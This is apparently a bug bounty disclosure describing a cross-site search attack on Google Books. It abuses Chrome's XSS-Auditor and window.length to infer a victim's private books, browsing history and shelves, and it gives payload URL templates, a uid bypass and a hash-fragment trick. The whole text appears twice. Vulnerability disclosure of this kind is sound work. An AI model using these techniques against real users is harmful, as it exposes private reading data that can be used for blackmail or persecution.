Google books leakage
Summary
Leaking user’s private data such as purchased books, books browsing history, private bookshelves from Google Book website by abusing the XSS-Auditor
and window.length
.
Introduction
Recently, I have been looking for XS-Search [1] vulnerabilities all over Google. While testing Google Books, I discovered that depending on the results slight changes in the source code are being made. It looked like a good entry point for the XS-Search attack, indeed, by abusing the XSS-Auditor
I managed to exfiltrate user’s private information by a prepared website.
When inspecting the source code of the page, I noticed that if there is at least one book being shown in search results a specific JavaScript code is inserted and that it doesn’t happen otherwise. The code starts with:
<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
, where <title>
is the book title of the first record.
For a given <title>
and user’s <uid>
I was able to create a payload https://books.google.com/books?uid=<uid>&num=1&q=<title>&x=<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
which if the query &q=<title>
returns a record the window will be blocked by the XSS-Auditor
(because of the “reflected” parameter xss
detected) and won’t be otherwise.
Another observation I have made is that when the page is being blocked by the XSS-Auditor
the window.length
is equal to 0
(which means no iframes are embedded) and otherwise, it quickly becomes greater than it.
Having these observations allows the attacker to match the list of book titles and for each one to determine whether the victim ever “touched” that title. In the next sections, I will demonstrate a much more advanced attack which exfiltrates more detailed information.
Going further – uid=vulnerability
The main downside of presented in the previous section (#Introduction) attack is that the attacker has to know the victim’s<uid>
which makes the attack much less wide. To extend it further I decided to test a few things out. Those experiments led me to the following observations:
The behavior is super strange, but the last observation allows the attacker to perform XS-Search
attack without knowing the victim’s <uid>
.
Efficient attack
Thanks to #Going further–uid=vulnerability we already extended the attack very well but we are not done yet.
To begin the chapter, it’s important to mention that the results can be limited to one record by setting the query parameter num=1
and also can be accessed at any offset with help of the start=<offset>
. It allows for searching through the library one title after another.
Also, by knowing the <id>
of a specific shelf we can limit the results to match only the records from that container, which is done by setting the parameter as_coll=<id>
. The default bookshelves have theirs <id>
in range [0, 10]
(e.g. Browsing History has as_coll=9
) and the custom ones are incremental, starting with as_coll=1001
. It allows the attacker to explore the victim’s private bookshelf .
Another key observation is that the attacker doesn’t have to bruteforce queries title by title. The XSS-Auditor
can be tricked by providing multiple “reflected” parameters in one query ?x=<payload1><payload2><payload3>..
where if at least one <payloadN>
matches the resulted code the page will be blocked. Because of it, the attacker can quickly find a match using algorithms such as binary search. The only mitigation here is the length of the URL limited by the server which can be easily bypassed with hash query #x=..
instead of ?x=..
. It’s because the hash part #x=
is not sent to the server and there is a bug in the XSS-Auditor
[2] making the Auditor search for reflection in those URL fragments as well. It also seems that the length of the hash part is pretty much unlimited - I successfully injected 500k characters.
Combining all the presented observations allows the attacker to obtain detailed
information about the victim in an extremely efficient way.
Attack scenario
A regular user of Google Books can have their private information leaked when visiting a prepared website. The leaked information consists of items such as Searched Books, Private Book Collections, Purchased Books etc. The attacker can use this information to embarrass, blackmail, threaten or even to draw legal consequences from the victim because a specific set of books can be banned in some countries (https://en.wikipedia.org/wiki/List_of_books_banned_by_governments).
Setup
I have created a proof of concept https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html but to make it fully working you will need:
Tested on newest Google Chrome - Version 71.0.3578.98 (Official Build) (64-bit)
Steps to reproduce
- Visit https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html and click anywhere on the website.
- Chose an option and fill the required fields with the information obtained from #Setup
- Wait for the results
Behind the scenes
- Upon visiting the website and making an action a new window is being opened. The former one will be used for further redirections.
- Upon choosing an option:
2a. Have I touched that title?
- the request to https://books.google.com/books?uid=vuln&num=1&q=<title>&x=<xss>
is being made in the background where <xss>
is the payload mentioned in #Introduction
- the script watches for window.length
change - if it changed to 1
it means that the <title>
was not found in the victim’s library. Otherwise, after a fixed amount of time, the script will conclude that the page was blocked by the Auditor and hence the <title>
was found.
2b. What ONE title have I chosen?
- the binary search is being run in the background based on halving the list of titles in each turn depending on in which half the title is included. The URL of the requests is https://books.google.com/books?uid=vuln&as_coll=<id>&num=1&start=<offset>#x=<xss>
.
2c. What FIVE titles have I chosen?
- same as 2a but repeated 5 times.
- Results are being displayed.

Google books leakage
Summary
Leaking user’s private data such as purchased books, books browsing history, private bookshelves from Google Book website by abusing the
XSS-Auditor
andwindow.length
.Introduction
Recently, I have been looking for XS-Search [1] vulnerabilities all over Google. While testing Google Books, I discovered that depending on the results slight changes in the source code are being made. It looked like a good entry point for the XS-Search attack, indeed, by abusing the
XSS-Auditor
I managed to exfiltrate user’s private information by a prepared website.When inspecting the source code of the page, I noticed that if there is at least one book being shown in search results a specific JavaScript code is inserted and that it doesn’t happen otherwise. The code starts with:
<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
, where<title>
is the book title of the first record.For a given
<title>
and user’s<uid>
I was able to create a payloadhttps://books.google.com/books?uid=<uid>&num=1&q=<title>&x=<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
which if the query&q=<title>
returns a record the window will be blocked by theXSS-Auditor
(because of the “reflected” parameterxss
detected) and won’t be otherwise.Another observation I have made is that when the page is being blocked by the
XSS-Auditor
thewindow.length
is equal to0
(which means no iframes are embedded) and otherwise, it quickly becomes greater than it.Having these observations allows the attacker to match the list of book titles and for each one to determine whether the victim ever “touched” that title. In the next sections, I will demonstrate a much more advanced attack which exfiltrates more detailed information.
Going further – uid=vulnerability
The main downside of presented in the previous section (#Introduction) attack is that the attacker has to know the victim’s
<uid>
which makes the attack much less wide. To extend it further I decided to test a few things out. Those experiments led me to the following observations:https://books.google.com/books?uid=<uid>&hl=en
.https://books.google.com/books?uid=<uid>&hl=en
.https://www.google.com/search?tbo=p&tbm=bks&q=hack
.The behavior is super strange, but the last observation allows the attacker to perform
XS-Search
attack without knowing the victim’s<uid>
.Efficient attack
Thanks to #Going further–uid=vulnerability we already extended the attack very well but we are not done yet.
To begin the chapter, it’s important to mention that the results can be limited to one record by setting the query parameter
num=1
and also can be accessed at any offset with help of thestart=<offset>
. It allows for searching through the library one title after another.Also, by knowing the
<id>
of a specific shelf we can limit the results to match only the records from that container, which is done by setting the parameteras_coll=<id>
. The default bookshelves have theirs<id>
in range[0, 10]
(e.g. Browsing History hasas_coll=9
) and the custom ones are incremental, starting withas_coll=1001
. It allows the attacker to explore the victim’s private bookshelf .Another key observation is that the attacker doesn’t have to bruteforce queries title by title. The
XSS-Auditor
can be tricked by providing multiple “reflected” parameters in one query?x=<payload1><payload2><payload3>..
where if at least one<payloadN>
matches the resulted code the page will be blocked. Because of it, the attacker can quickly find a match using algorithms such as binary search. The only mitigation here is the length of the URL limited by the server which can be easily bypassed with hash query#x=..
instead of?x=..
. It’s because the hash part#x=
is not sent to the server and there is a bug in theXSS-Auditor
[2] making the Auditor search for reflection in those URL fragments as well. It also seems that the length of the hash part is pretty much unlimited - I successfully injected 500k characters.Combining all the presented observations allows the attacker to obtain detailed
information about the victim in an extremely efficient way.
Attack scenario
A regular user of Google Books can have their private information leaked when visiting a prepared website. The leaked information consists of items such as Searched Books, Private Book Collections, Purchased Books etc. The attacker can use this information to embarrass, blackmail, threaten or even to draw legal consequences from the victim because a specific set of books can be banned in some countries (https://en.wikipedia.org/wiki/List_of_books_banned_by_governments).
Setup
I have created a proof of concept https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html but to make it fully working you will need:
S1
andS2
with their<id>
created (bookshelves can be created in My Libraryhttps://books.google.com/books?uid=<uid>&hl=en
, obtaining<id>
can be done just by watching the URL foras_coll=<id>
after visiting the created shelf)S1
chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.htmlS2
chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.htmlTested on newest Google Chrome - Version 71.0.3578.98 (Official Build) (64-bit)
Steps to reproduce
Behind the scenes
2a.
Have I touched that title?
- the request to
https://books.google.com/books?uid=vuln&num=1&q=<title>&x=<xss>
is being made in the background where<xss>
is the payload mentioned in #Introduction- the script watches for
window.length
change - if it changed to1
it means that the<title>
was not found in the victim’s library. Otherwise, after a fixed amount of time, the script will conclude that the page was blocked by the Auditor and hence the<title>
was found.2b.
What ONE title have I chosen?
- the binary search is being run in the background based on halving the list of titles in each turn depending on in which half the title is included. The URL of the requests is
https://books.google.com/books?uid=vuln&as_coll=<id>&num=1&start=<offset>#x=<xss>
.2c.
What FIVE titles have I chosen?
- same as 2a but repeated 5 times.